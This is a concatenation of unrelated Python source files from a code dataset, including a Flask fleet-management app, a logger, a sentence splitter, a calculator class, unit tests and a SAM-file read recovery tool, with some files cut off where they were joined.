        Generator tuples of form (comb(keywords,1), keyword)

    Examples:
        k = ['a', 'b', 'c', 'd']
        Input:
            combos(k,2)
        Output:
            ("a"%20"b", 'a b')
            ("a"%20"c", 'a c')
            ...
            ("c"%20"d", 'c d')
    """
    quote = '%22'
    if len(keywords) == 0:
        # Sentinel so callers' nested loops still execute once.
        yield '%20', '%20'
    for x in list(combinations(keywords, degree)):
        if not x:
            # for empty string (only possible when degree == 0 yields one empty tuple)
            yield '%20', '%20'
            # BUG FIX: without this continue the empty tuple also fell through
            # and yielded a bogus ('%22%22', '') pair below.
            continue
        # yield ('"' + '"%20"'.join(x) + '"', ' '.join(x))
        yield quote + '%22%20%22'.join(x) + quote, ' '.join(x)
@staticmethod
def _type_checking(**kwargs):
    """
    Rudimentary type checking of input variables. This is run at the end of the __init__ instance of a class.

    Returns:
        None, if checked inputs pass given criteria

    Raises:
        ValueError / TypeError when an input fails a check.
    """
    if (not isinstance(kwargs['entity'], list) or len(kwargs['entity']) == 0) and (
            not isinstance(kwargs['keywords'], dict)):
        raise ValueError('entities and keywords must both be lists with len >0')
    if not (isinstance(kwargs['keywords_excluded'], dict) or kwargs['keywords_excluded'] is None):
        raise TypeError('filter keywords must be of type == dict with the key a supported language string')
    if len(set(kwargs['keywords'])) < len(kwargs['keywords']):
        raise ValueError('Don\'t use duplicate keywords.')
    # NOTE(review): the loop below iterates keywords_excluded directly, which for
    # a dict (the type required above) walks the *language keys*, not the
    # excluded keyword lists — looks like legacy list handling; confirm intent.
    if kwargs['keywords_excluded'] is not None:
        for filtered in kwargs['keywords_excluded']:
            if len(filtered.replace(' ', '')) == 0:
                raise ValueError('Don\'t use empty quotes or space in filter. '
                                 'Make sure there is no end line of file.')
| 2.265625 | 2 |
code/metrics/logger.py | HS-YN/PanoAVQA | 3 | 12769734 | # Simple tb logger
import torch
from exp import ex
# Per-geometry normalization constants used by adjust_grounding_error below.
# BUG FIX: this table was previously commented out in a triple-quoted string,
# so adjust_grounding_error raised NameError when called.
geometry_normalizer = {
    'cartesian': 4,        # [0,1]x[0,1]x[0,1]x[0,1]
    'angular': 98.696,     # [-pi,pi]x[-.5pi,.5pi]x[0,2pi]x[0,pi]
    'spherical': 61.348,   # [-1,1]x[-1,1]x[-1,1]x[0,2pi]x[0,pi]
    'quaternion': 17,      # [0,1]x[-1,1]x[-1,1]x[0,2]x[0,2]
}
def write_logs(logger, timestamp, lr, stat, meta, mode="train"):
    """Push entries of `stat` to a tensorboard-style logger under the mode's tag.

    Zero-dim tensors (and, outside train mode, plain ints/floats) become
    scalars; strings become text entries; all other value types are skipped.
    `meta` is currently unused.
    """
    if mode == "train":
        logger.add_scalar('Train/lr', lr, timestamp)
        for key, val in stat.items():
            # NOTE: exact type checks (not isinstance) preserved deliberately.
            if type(val) == torch.Tensor and val.dim() == 0:
                logger.add_scalar(f'Train/{key}', val.item(), timestamp)
            elif type(val) == str:
                logger.add_text(f'Train/{key}', val, timestamp)
        return
    tag = mode.capitalize()
    for key, val in stat.items():
        if type(val) in [int, float]:
            logger.add_scalar(f'{tag}/{key}', val, timestamp)
        elif type(val) == torch.Tensor and val.dim() == 0:
            logger.add_scalar(f'{tag}/{key}', val.item(), timestamp)
        elif type(val) == str:
            logger.add_text(f'{tag}/{key}', val, timestamp)
    #logger.add_image('Eval/image', img, timestamp)
#logger.add_image('Eval/image', img, timestamp)
@ex.capture()
def adjust_grounding_error(error, geometry):
    """Scale a grounding error by its geometry's parameter-domain volume.

    BUG FIX: the module-level `geometry_normalizer` table was commented out,
    so this function raised NameError when called; the constants are inlined
    here to make it self-contained.
    """
    normalizer = {
        'cartesian': 4,        # [0,1]^4
        'angular': 98.696,     # [-pi,pi]x[-.5pi,.5pi]x[0,2pi]x[0,pi]
        'spherical': 61.348,   # [-1,1]^3 x [0,2pi]x[0,pi]
        'quaternion': 17,      # [0,1]x[-1,1]x[-1,1]x[0,2]x[0,2]
    }
    return error * normalizer[geometry]
complete/31 - 40/Problem31/main2.py | this-jacob/project-euler | 0 | 12769735 | from time import time
def main():
start = time()
target = 200
ways = 0
for a in range(target, -1, -200):
for b in range(a, -1, -100):
for c in range(b, -1, -50):
for d in range(c, -1, -20):
for e in range(d, -1, -10):
for f in range(e, -1, -5):
for g in range(f, -1, -2):
ways += 1
print(ways)
print(time() - start)
# Run the solver only when executed as a script.
if __name__ == '__main__':
    main()
| 3 | 3 |
app.py | Siddhesh268/Fleet-Management-system | 0 | 12769736 | <reponame>Siddhesh268/Fleet-Management-system
import sys,pickle
from flask import Flask,flash, redirect, url_for, request, render_template, abort, jsonify,g
from socket import socket, AF_INET, SOCK_STREAM
from connection import setConnection
from Analysis import *
app = Flask(__name__)
# Secret key signs Flask sessions/flash messages.
# NOTE(review): hard-coded secret — should come from config/env in production.
app.secret_key = 'my unobvious secret key'
@app.route('/logout/')
def logout():
    # Ask the backend service to stop, then show the goodbye page.
    flash(setConnection(["stop"]))
    return render_template('bye.html')


@app.route('/invoice/<trip_id>')
def invoice(trip_id):
    # Printable invoice for a single trip.
    trip = setConnection(["read_tripByID", trip_id])
    return render_template('invoice.html', trip=trip)


@app.route('/expenseReport/')
def expenseReport():
    # Generate the expenditure report (side effect in Analysis module), then go home.
    Expenditure()
    return redirect(url_for('index'))


@app.route('/ProfitLossReport/')
def ProfitLossReport():
    # Generate the profit/loss (liability vs asset) report, then go home.
    liabilityasset()
    return redirect(url_for('index'))


@app.route('/MaintenanceReport/')
def MaintenanceReport():
    # Generate the maintenance report, then go home.
    Maintenance()
    return redirect(url_for('index'))
# NOTE(review): indentation was lost in this copy; the redirects below are
# nested inside the POST checks (harmless either way since these routes accept
# POST only, which also makes the request.method checks redundant).

@app.route('/driver_on_vehicle/', methods=['POST'])
def driver_on_vehicle():
    # Assign a driver (by name) to a vehicle.
    if request.method == 'POST':
        lis = ["write_driverOnVehicle", request.form["veh_no"], request.form["driver_name"]]
        flash(setConnection(lis))
        return redirect(url_for('index'))


@app.route('/start_trip/<veh_no>', methods=['POST'])
def start_trip(veh_no):
    # Open a new trip for the vehicle with customer/route/cost details.
    if request.method == 'POST':
        lis = ["write_trips", veh_no, request.form["customer_name"], request.form["source"], request.form["destination"], request.form["cost"], request.form["freight"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/stop_trip/<veh_no>/<trip_id>', methods=['POST'])
def stop_trip(veh_no, trip_id):
    # Mark an in-progress trip as finished.
    if request.method == 'POST':
        lis = ["update_trip", trip_id]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/add_trip_details/<veh_no>/<trip_id>', methods=['POST'])
def add_trip_details(veh_no, trip_id):
    # Record an expense (amount/date/place/reason) against a trip.
    if request.method == 'POST':
        lis = ["write_trip_details", trip_id, request.form["amt"], request.form["date_of_tran"], request.form["place"], request.form["reason"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/deleteVehicle/<veh_no>', methods=['POST'])
def deleteVehicle(veh_no):
    # Remove a vehicle record.
    if request.method == 'POST':
        flash(setConnection(["delete_vehicles", veh_no]))
        return redirect(url_for('index'))


@app.route('/deleteDriver/<driver_id>', methods=['POST'])
def deleteDriver(driver_id):
    # Remove a driver record.
    if request.method == 'POST':
        flash(setConnection(["delete_drivers", driver_id]))
        return redirect(url_for('index'))


@app.route('/insurance/<veh_no>', methods=['POST'])
def insurance(veh_no):
    # Attach an insurance policy (number/validity/cost/company) to a vehicle.
    if request.method == 'POST':
        lis = ["write_insurances", veh_no, request.form["ins_no"], request.form["validf"], request.form["validu"], request.form["cost"], request.form["icomp"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/permit/<veh_no>', methods=['POST'])
def permit(veh_no):
    # Attach a road permit to a vehicle.
    if request.method == 'POST':
        lis = ["write_permits", veh_no, request.form["pno"], request.form["validf"], request.form["validu"], request.form["cost"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/loan/<veh_no>', methods=['POST'])
def loan(veh_no):
    # Register a loan (amount/company/duration/interest) against a vehicle.
    if request.method == 'POST':
        lis = ["write_loans", veh_no, request.form["lno"], request.form["costt"], request.form["lcomp"], request.form["dur"], request.form["intr"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/maintenance/<veh_no>', methods=['POST'])
def maintenance(veh_no):
    # Record a maintenance event (remark/place/cost/vendor/date).
    if request.method == 'POST':
        lis = ["write_maintenance", veh_no, request.form["rmk"], request.form["plc"], request.form["cost"], request.form["vend"], request.form["dom"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))


@app.route('/tax/<veh_no>', methods=['POST'])
def tax(veh_no):
    # Record a tax payment for a vehicle.
    if request.method == 'POST':
        lis = ["write_taxes", veh_no, request.form["tno"], request.form["validf"], request.form["validu"], request.form["cost"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))
@app.route('/add_customer/', methods=['POST'])
def add_customer():
    # Create a customer (name/company/contact/address).
    if request.method == 'POST':
        lis = ["write_customers", request.form["Cus_name"], request.form["Comp_name"], request.form["Cus_contact"], request.form["Cus_address"]]
        flash(setConnection(lis))
        return redirect(url_for('index'))


@app.route('/add_driver/', methods=['POST'])
def add_driver():
    # Create a driver (name/license/contact).
    if request.method == 'POST':
        lis = ["write_drivers", request.form["driver_name"], request.form["License_no"], request.form["contact_no"]]
        flash(setConnection(lis))
        return redirect(url_for('index'))


@app.route('/add_vehicle/', methods=['POST'])
def add_vehicle():
    # Create a vehicle (number/chassis/class/capacity).
    if request.method == 'POST':
        lis = ["write_vehicles", request.form["veh_no"], request.form["chassis_no"], request.form["vehicle_class"], request.form["vehicle_capacity"]]
        flash(setConnection(lis))
        return redirect(url_for('index'))


@app.route('/add_dependent/<driver_id>', methods=['POST'])
def add_dependent(driver_id):
    # Add a dependent (name/relation/contact) to a driver.
    if request.method == 'POST':
        lis = ["write_dependents", driver_id, request.form["nm"], request.form["rel"], request.form["cnt"]]
        flash(setConnection(lis))
        return redirect(url_for('driver', driver_id=driver_id))


@app.route('/add_salary/<driver_id>', methods=['POST'])
def add_salary(driver_id):
    # Record a salary payment for a driver.
    if request.method == 'POST':
        lis = ["write_salary", driver_id, request.form["salary"]]
        flash(setConnection(lis))
        return redirect(url_for('driver', driver_id=driver_id))


@app.route('/pay_loan/<veh_no>/<loan_no>', methods=['POST'])
def pay_loan(veh_no, loan_no):
    # Record an EMI payment against a vehicle's loan.
    if request.method == 'POST':
        lis = ["write_loanPayRegister", loan_no, request.form["emi"]]
        flash(setConnection(lis))
        return redirect(url_for('vehicle', veh_no=veh_no))
@app.route('/')
def index():
    """Dashboard page listing all vehicles, drivers and customers."""
    context = {
        "vehicles": setConnection(["read_vehicles"]),
        "drivers": setConnection(["read_drivers"]),
        "customers": setConnection(["read_customers"]),
    }
    return render_template('Mainboot.html', **context)
@app.route('/driver/<driver_id>')
def driver(driver_id):
    """Detail page for one driver, including the driver's dependents."""
    # Renamed locals so they no longer shadow this view function's name.
    driver_info = setConnection(["read_driver", driver_id])
    dependent_rows = setConnection(["read_dependents", driver_id])
    return render_template('Driver.html', driver=driver_info,
                           dependents=dependent_rows)
@app.route('/vehicle/<veh_no>')
def vehicle(veh_no):
    """Detail page for one vehicle: trips, loans, taxes and customers."""
    vehicle_info = setConnection(["read_vehicle", veh_no])
    customers = setConnection(["read_customers"])
    trip_detail = setConnection(["read_tripDetails", veh_no])
    loan_progress = setConnection(["read_loans", veh_no])
    loan_status = setConnection(["read_loanStatus", veh_no])
    status = setConnection(["read_trips", veh_no])
    # Trailing 0 sentinel -- presumably expected by Vehicle.html; confirm there.
    status.append(0)
    loan_progress.append(0)
    return render_template('Vehicle.html', loanStatus=loan_status,
                           loanProgress=loan_progress, vehicle=vehicle_info,
                           customers=customers, tripDetail=trip_detail,
                           status=status)
if __name__ == '__main__':
    # Development server only -- debug=True must not be used in production.
    app.run(debug = True)
| 2.34375 | 2 |
apps/init_before_startup.py | osroom/osroom | 579 | 12769737 | <filename>apps/init_before_startup.py
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2020/03/14 12:44
# @Author : <NAME>
import sys
from signal import signal, SIGCHLD, SIG_IGN
from pymongo.errors import OperationFailure
from apps.configs.db_config import DB_CONFIG
from apps.core.db.config_mdb import DatabaseConfig
from apps.core.db.mongodb import MyMongo
from apps.develop_run_options import start_info_print
from apps.app import app
from apps.brand_info import start_info
def init_before_startup(is_debug, csrf_enabled):
    """
    Initialize data before the application starts serving.

    Temporarily connects to MongoDB to update collections and system
    configuration, imports core modules, and runs compatibility fixes.

    :param is_debug: True when running under the debugger; collection /
        config update steps are then skipped (they need a non-debug run).
    :param csrf_enabled: forwarded to core-module initialization.
    :return: None.  Exits the process on DB auth or configuration errors.
    """
    start_info()
    start_info_print("\033[1;36m osroom staring...\033[0m")
    # Before the site starts, connect to the database temporarily to update
    # collections & the system configuration.
    from apps.core.utils.update_sys_data import update_mdb_collections, init_datas, \
        compatible_processing
    database = DatabaseConfig()
    mdbs = {}
    # Create local, temporary database client objects.
    for k, mdb_acc in DB_CONFIG["mongodb"].items():
        mdbs[k] = MyMongo()
    # Initialize twice: the first pass updates the mdb collections; if new
    # collections appeared, re-initialize so the rest of the program sees them.
    db_init = 2
    while db_init:
        try:
            for name, mdb in mdbs.items():
                if db_init == 1:
                    mdb.close()
                if name not in ["sys", "user", "web"]:
                    msg = "[Error]: 由v1.x.x更新到v2.x.x需要请更新你的数据库配置文件apps/configs/db_config.py." \
                          "请参考同目录下的db_config_sample.py"
                    start_info_print('\033[31m{}\033[0m'.format(msg))
                    sys.exit()
                mdb.init_app(
                    config_prefix=name.upper(),
                    db_config=database.__dict__["{}_URI".format(name.upper())]
                )
        except OperationFailure as e:
            msg = "\n[Mongodb] *{}\nMongodb validation failure, the user name, " \
                  "password mistake or database configuration errors.\n" \
                  "Tip: to open database authentication configuration".format(e)
            start_info_print('\033[31m{}\033[0m'.format(msg))
            sys.exit(-1)
        if db_init == 2 and is_debug:
            # Update database collections.
            start_info_print(" * Check or update the database collection")
            update_mdb_collections(mdbs=mdbs)
        else:
            # Collections were not updated; no second initialization needed.
            break
        db_init -= 1
    if not is_debug:
        # Update the configuration file.
        from apps.core.flask.update_config_file import update_config_file
        start_info_print(" * Update and sync config.py")
        r = update_config_file(mdbs=mdbs)
        if not r:
            start_info_print("[Error] Update profile error, check log sys_start.log")
            sys.exit(-1)
    else:
        msgs = " * The following services need to be run in a non-debugger state.\n" \
               " Including the following services:- Automatic update of Mongodb collections.\n" \
               " - Automatic update of website routing rights control.\n" \
               " - Automatically update and merge system configuration.\n\n"
        warning_msg = "\033[03m " \
                      "If the program runs incorrectly because the above configuration \n" \
                      " is not updated, you need to remove the debugger running program \n" \
                      " first to implement the update. After that, you can continue to run \n" \
                      " the program under the debugger."
        start_info_print('\033[33m{}{}\033[0m'.format(msgs, warning_msg))
    # Run compatibility processing, stage 1.
    compatible_processing(mdbs=mdbs, stage=1)
    # Initialize data.
    init_datas(mdbs=mdbs)
    for mdb in mdbs.values():
        mdb.close()
    # Core program initialization + module loading.
    from apps.core.flask.module_import import module_import
    from apps.init_core_module import init_core_module
    from apps.configs.sys_config import MODULES
    init_core_module(
        app,
        csrf_enabled=csrf_enabled,
        is_debug=is_debug
    )
    module_import(MODULES)
    # Run compatibility processing, stage 2.
    from apps.app import mdbs
    compatible_processing(mdbs=mdbs, stage=2)
    if not is_debug:
        start_info_print(
            " * Signal:(SIGCHLD, SIG_IGN)."
            "Prevent child processes from becoming [Defunct processes]."
            "(Do not need to comment out)")
        signal(SIGCHLD, SIG_IGN)
        start_info_print(" * Started successfully")
    else:
        start_info_print(" * Debugger: Started successfully")
| 1.984375 | 2 |
tests/test_jdla_basic.py | JosueDLA/BasicModule | 0 | 12769738 | <gh_stars>0
import unittest
from jdla_basic import basic_operations
class Test_basic_opea(unittest.TestCase):
    """Unit tests for jdla_basic.basic_operations (add/sub/mul/div),
    covering all sign combinations and division by zero."""

    def test_add(self):
        # Sign combinations for addition.
        self.assertEqual(basic_operations.addition(10, 5), 15)
        self.assertEqual(basic_operations.addition(-1, 1), 0)
        self.assertEqual(basic_operations.addition(1, -1), 0)
        self.assertEqual(basic_operations.addition(-1, -1), -2)
    def test_sub(self):
        # Subtraction is not commutative: both argument orders are checked.
        self.assertEqual(basic_operations.substraction(10, 5), 5)
        self.assertEqual(basic_operations.substraction(-1, 1), -2)
        self.assertEqual(basic_operations.substraction(1, -1), 2)
        self.assertEqual(basic_operations.substraction(-1, -1), -0)
    def test_multi(self):
        # Sign combinations for multiplication.
        self.assertEqual(basic_operations.multiplication(10, 5), 50)
        self.assertEqual(basic_operations.multiplication(-1, 1), -1)
        self.assertEqual(basic_operations.multiplication(1, -1), -1)
        self.assertEqual(basic_operations.multiplication(-1, -1), 1)
    def test_divi(self):
        self.assertEqual(basic_operations.division(10, 5), 2)
        self.assertEqual(basic_operations.division(-1, 1), -1)
        self.assertEqual(basic_operations.division(1, -1), -1)
        self.assertEqual(basic_operations.division(-1, -1), 1)
        # self.assertRaises Value expected, method, args
        self.assertRaises(ValueError, basic_operations.division, 10, 0)
        # Test Exception using context manager
        with self.assertRaises(ValueError):
            basic_operations.division(10, 0)
if __name__ == '__main__':
    # Allow running this test module directly: `python test_jdla_basic.py`.
    unittest.main()
| 3.09375 | 3 |
jionlp/gadget/split_sentence.py | Hello-Toufu/jionlp | 0 | 12769739 | <gh_stars>0
# -*- coding=utf-8 -*-
import os
import re
import pdb
class SplitSentence(object):
    """Sentence splitter for Chinese text with two punctuation granularities
    (coarse = sentence-level punctuation, fine = all punctuation)."""

    def __init__(self):
        # Punctuation tables are built lazily on first call (see _prepare).
        self.puncs_fine = None

    def _prepare(self):
        """Build the punctuation tables and the compiled split patterns."""
        self.puncs_fine = ['……', '\r\n', ',', '。', ';', ';', '…', '!',
                           '!', '?', '?', '\r', '\n', '“', '”', '‘', '’',
                           ':']
        self.puncs_coarse = ['。', '!', '?', '\n', '“', '”', '‘', '’']
        # Opening quotes: the fragment that follows belongs to the quote.
        self.front_quote_list = ['“', '‘']
        # NOTE(review): the character class below does not exactly match
        # `puncs_coarse` (e.g. '‘'/'’' are absent) -- confirm this is intended.
        self.puncs_coarse_ptn = re.compile('([。“”!?\n])')
        self.puncs_fine_ptn = re.compile('([,:。;“”;…!!??\r\n])')

    def __call__(self, text, criterion='coarse'):
        '''Split *text* into a list of sentences.
        Args:
            text(str): input string
            criterion(str): split granularity, either ``coarse`` (split on
                sentence-level punctuation only) or ``fine`` (split on all
                punctuation); defaults to ``coarse``
        Returns:
            list(str): sentence fragments with the delimiters kept attached
        Examples:
            >>> text = '中华古汉语,泱泱大国,历史传承的瑰宝。'
            >>> print(bbd.split_sentences(text, criterion='fine'))
            ['中华古汉语,', '泱泱大国,', '历史传承的瑰宝。']
        '''
        if self.puncs_fine is None:
            self._prepare()
        # re.split with a capturing group keeps the delimiters in the list.
        if criterion == 'coarse':
            tmp_list = self.puncs_coarse_ptn.split(text)
        elif criterion == 'fine':
            tmp_list = self.puncs_fine_ptn.split(text)
        else:
            raise ValueError('The parameter `criterion` must be '
                             '`coarse` or `fine`.')
        final_sentences = list()
        cur_flag = 0  # NOTE(review): never read afterwards -- apparently unused
        quote_flag = False
        for idx, sen in enumerate(tmp_list):
            if sen == '':
                continue
            if criterion == 'coarse':
                if sen in self.puncs_coarse:
                    # Opening quotes are special: the fragment after them is
                    # merged with the quote, not with the previous sentence.
                    if sen in self.front_quote_list:
                        quote_flag = True
                        final_sentences.append(sen)
                        continue
                    if len(final_sentences) == 0:
                        final_sentences.append(sen)
                    else:
                        final_sentences[-1] = ''.join(
                            [final_sentences[-1], sen])
                    continue
            elif criterion == 'fine':
                if sen in self.puncs_fine:
                    # Opening quotes are special: see the coarse branch above.
                    if sen in self.front_quote_list:
                        quote_flag = True
                        final_sentences.append(sen)
                        continue
                    if len(final_sentences) == 0:
                        final_sentences.append(sen)
                    else:
                        final_sentences[-1] = ''.join(
                            [final_sentences[-1], sen])
                    continue
            if quote_flag:
                final_sentences[-1] = ''.join([final_sentences[-1], sen])
                quote_flag = False
            else:
                final_sentences.append(sen)
        return final_sentences
if __name__ == '__main__':
    # Quick smoke test for fine-grained splitting.
    split_sentence = SplitSentence()
    text = '中华古汉语,泱泱大国,历史传承的瑰宝。。'
    res = split_sentence(text, criterion='fine')
    print(res)
| 3.046875 | 3 |
pycti/__init__.py | Cix-16/client-python | 0 | 12769740 | <reponame>Cix-16/client-python
# -*- coding: utf-8 -*-
from .api.opencti_api_client import OpenCTIApiClient
from .api.opencti_api_connector import OpenCTIApiConnector
from .api.opencti_api_job import OpenCTIApiJob
from .connector.opencti_connector import ConnectorType
from .connector.opencti_connector import OpenCTIConnector
from .connector.opencti_connector_helper import (
OpenCTIConnectorHelper,
get_config_variable,
)
from .entities.opencti_tag import Tag
from .entities.opencti_marking_definition import MarkingDefinition
from .entities.opencti_external_reference import ExternalReference
from .entities.opencti_kill_chain_phase import KillChainPhase
from .entities.opencti_stix_entity import StixEntity
from .entities.opencti_stix_domain_entity import StixDomainEntity
from .entities.opencti_stix_observable import StixObservable
from .entities.opencti_stix_relation import StixRelation
from .entities.opencti_stix_sighting import StixSighting
from .entities.opencti_stix_observable_relation import StixObservableRelation
from .entities.opencti_identity import Identity
from .entities.opencti_threat_actor import ThreatActor
from .entities.opencti_intrusion_set import IntrusionSet
from .entities.opencti_campaign import Campaign
from .entities.opencti_incident import Incident
from .entities.opencti_malware import Malware
from .entities.opencti_tool import Tool
from .entities.opencti_vulnerability import Vulnerability
from .entities.opencti_attack_pattern import AttackPattern
from .entities.opencti_course_of_action import CourseOfAction
from .entities.opencti_report import Report
from .entities.opencti_note import Note
from .entities.opencti_opinion import Opinion
from .entities.opencti_indicator import Indicator
from .utils.opencti_stix2 import OpenCTIStix2
from .utils.constants import ObservableTypes
from .utils.constants import CustomProperties
# Public API of the pycti package: `from pycti import *` exposes exactly
# these names (client, connector helpers, STIX entities and utilities).
__all__ = [
    "OpenCTIApiClient",
    "OpenCTIApiConnector",
    "OpenCTIApiJob",
    "ConnectorType",
    "OpenCTIConnector",
    "OpenCTIConnectorHelper",
    "get_config_variable",
    "Tag",
    "MarkingDefinition",
    "ExternalReference",
    "KillChainPhase",
    "StixEntity",
    "StixDomainEntity",
    "StixObservable",
    "StixRelation",
    "StixSighting",
    "StixObservableRelation",
    "Identity",
    "ThreatActor",
    "IntrusionSet",
    "Campaign",
    "Incident",
    "Malware",
    "Tool",
    "Vulnerability",
    "AttackPattern",
    "CourseOfAction",
    "Report",
    "Note",
    "Opinion",
    "Indicator",
    "OpenCTIStix2",
    "ObservableTypes",
    "CustomProperties",
]
| 1.109375 | 1 |
src/calculator/calculator.py | Rafiatu/calculator | 0 | 12769741 | <reponame>Rafiatu/calculator<filename>src/calculator/calculator.py
class CalculatorException(Exception):
    """Raised when a calculator operation receives an invalid operand or
    attempts an impossible operation (e.g. division by zero)."""
    pass


class Calculator:
    """
    This is a simple Calculator that performs basic addition, subtraction,
    division, multiplication and root calculation of numbers.

    The calculator keeps a running value that starts at 0; every operation
    updates that value and returns it.  Invalid operands and impossible
    operations consistently raise ``CalculatorException``.
    """

    def __init__(self):
        # Running value; name-mangled to force access through the operations.
        self.__val = 0

    def add(self, num: int or float or complex):
        """Add a number to the current value in the calculator and return it."""
        try:
            self.__val += num
            return self.__val
        except TypeError:
            # Message fixed: floats and complex are accepted too; only
            # non-numeric operands are rejected.
            raise CalculatorException("Something went wrong. function add() takes only numbers")

    def subtract(self, num: int or float or complex):
        """Subtract a number from the current value in the calculator."""
        try:
            self.__val -= num
            return self.__val
        except TypeError:
            raise CalculatorException("Something went wrong. Ensure to use the right input types")

    def multiply(self, num: int or float or complex):
        """Multiply the current value in the calculator by the given number."""
        try:
            self.__val *= num
            return self.__val
        except TypeError:
            # Consistency fix: multiply previously leaked a raw TypeError
            # while every other operation raised CalculatorException.
            raise CalculatorException("Something went wrong. Ensure to use the right input types")

    def divide(self, num: int or float or complex):
        """Divide the current value in the calculator by the given number."""
        try:
            self.__val /= num
            return self.__val
        except ZeroDivisionError:
            raise CalculatorException("Something went wrong. "
                                      "You are most likely attempting a division with 0")
        except TypeError:
            raise CalculatorException("Something went wrong. Ensure to use the right input types")

    def root(self, num: int):
        """Replace the current value with its ``num``-th root and return it."""
        try:
            self.__val **= (1 / num)
            return self.__val
        except ZeroDivisionError:
            # 1/num fails exactly when num == 0; the message now says so
            # instead of the previous misleading division-by-0 wording.
            raise CalculatorException("Something went wrong. "
                                      "The root degree must not be 0")
        except TypeError:
            raise CalculatorException("Something went wrong. Ensure to use the right input types")

    def reset_memory(self):
        """Clear all calculator history and reset the value to zero."""
        self.__val = 0
        return self.__val
| 4.21875 | 4 |
sprint/tools_sam/recover_sam.py | jumphone/sprint | 44 | 12769742 | <gh_stars>10-100
#poly_limit=10
def poly_check(seq, poly_limit):
    """Return True when *seq* contains no homopolymer run (AAAA..., TTTT...,
    GGGG..., CCCC...) of length *poly_limit* or more."""
    for base in ('A', 'T', 'G', 'C'):
        if base * poly_limit in seq:
            return False
    return True
def var_check(change_from, change_to, seq, var_limit):
    """Return True when every base other than *change_from*/*change_to*
    occurs at least var_limit/(k+2) times in *seq*, where k is the number
    of those other bases."""
    excluded = (change_from.upper(), change_to.upper())
    others = [b for b in ('A', 'T', 'C', 'G') if b not in excluded]
    threshold = var_limit / (float(len(others)) + 2)
    return all(seq.count(b) >= threshold for b in others)
def reverse_base(base):
    """Return the Watson-Crick complement of *base* (case-insensitive),
    or 'N' for anything that is not A/C/G/T."""
    return {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}.get(base.upper(), 'N')
def recover_sam(sam_in_dir,sam_out_dir, var_limit=20,poly_limit=10,rm_multi=0):
	"""Rewrite a SAM file, restoring bases that were masked before alignment.

	The read name encodes the substitution and a per-position bitmask
	(fields separated by '_|_'); every flagged position is converted back
	from *change_to* to *change_from* ('N' if the observed base disagrees).
	Reads failing the evidence/homopolymer filters are dropped.

	:param sam_in_dir: input SAM path
	:param sam_out_dir: output SAM path
	:param var_limit: minimum count of unchanged bases required to keep a read
	:param poly_limit: homopolymer length that disqualifies a read
	:param rm_multi: 1 to drop multi-mapping reads (those carrying an XA:Z: tag)
	"""
	fi=open(sam_in_dir)
	fo=open(sam_out_dir,'w')
	for line in fi:
		seq=line.split('\t')
		if line[0]=='@':
			# Header lines are copied through unchanged.
			fo.write(line)
		elif seq[1]=='4' and seq[2]=='*':
			# NOTE(review): `break` aborts the whole file at the first
			# unmapped read -- this assumes unmapped reads are sorted last.
			# Confirm; otherwise `continue` may have been intended.
			break
		elif seq[1]!='4' and len(seq)>=9:
			seq=line.split('\t')
			seq[9]=seq[9].upper()
			seq[1]=int(seq[1])
			# Normalize the FLAG to '0'/'16' (strand only) -- bin(flag)[-5]
			# is presumably the reverse-strand bit (16) and [-3] the
			# unmapped bit (4); verify against the SAM spec.
			if len(bin(seq[1]))>=7:
				if bin(seq[1])[-3]!='1':
					if bin(seq[1])[-5]=='1':
						seq[1]='16'
					else:
						seq[1]='0'
			seq[1]=str(seq[1])
			# Bitmask of changed positions; the leading '1' added upstream
			# is stripped by the [3:] slice (after '0b').
			record=bin(int(seq[0].split('_|_')[2]))[3:]
			change_from=seq[0].split('_|_')[1].split('_')[0]
			change_to=seq[0].split('_|_')[1].split('_')[2]
			# Reverse-strand reads: complement the substitution and flip
			# the mask to match the stored (reversed) sequence.
			if len(bin(int(seq[1]))) > 5 and bin(int(seq[1]))[-5]=='1': #seq[1]=='16':
				change_from=reverse_base(change_from)
				change_to=reverse_base(change_to)
				record=record[::-1]
			else:
				record=record
			changed_read=seq[9]
			i=0
			recovered_read=''
			while i<len(seq[9]):
				if record[i]=='1' and seq[9][i]==change_to:
					recovered_read += change_from
				elif record[i]=='1' and seq[9][i]!=change_to:
					#print "recover error in "+seq[0]
					recovered_read += 'N'
				else:
					recovered_read += seq[9][i]
				i=i+1
			seq[9]=recovered_read
			#fo.write(seq[0])
			#if len(record)==len(seq[9]) and 'I' not in seq[5] and 'D' not in seq[5] and len(record)-changed_read.count(change_to) > 25 and poly_check(seq[9],poly_limit):
			# Keep only reads with enough unchanged-base evidence and no
			# long homopolymer; optionally drop multi-mapping reads.
			if len(record)==len(seq[9]) and len(record)-changed_read.count(change_to) > var_limit and poly_check(seq[9],poly_limit): #and var_check(change_from,change_to,seq[9],var_limit):
				if (rm_multi==1 and "XA:Z:" not in line) or rm_multi==0:
					fo.write(seq[0])
					j=1
					while j<len(seq):
						fo.write('\t'+seq[j])
						j=j+1
	fo.close()
	fi.close()
| 2.65625 | 3 |
hivwholeseq/patients/get_region_haplotypes.py | neherlab/hivwholeseq | 3 | 12769743 | # vim: fdm=marker
'''
author: <NAME>
date: 11/11/14
content: Get local haplotypes from single read pairs, including insertions
and deletions. This includes aggressive clustering to keep the
multiple sequence alignments efficient.
'''
# Modules
import os
import argparse
from operator import itemgetter
from itertools import izip
import numpy as np
from matplotlib import cm
import matplotlib.pyplot as plt
from hivwholeseq.patients.patients import load_patient
from hivwholeseq.utils.argparse import RoiAction
from hivwholeseq.utils.sequence import build_msa_haplotypes as build_msa
# Functions
def plot_haplotype_frequencies(times, hft, figax=None, title='',
                               picker=None):
    '''Plot stacked haplotype frequency trajectories over time.
    Parameters:
        times: time points (days from infection), x axis
        hft: (n_times, n_haplotypes) frequency matrix; rows assumed to sum
            to 1 -- TODO confirm with caller
        figax: optional (fig, ax) pair to draw into; a new one is created
            otherwise
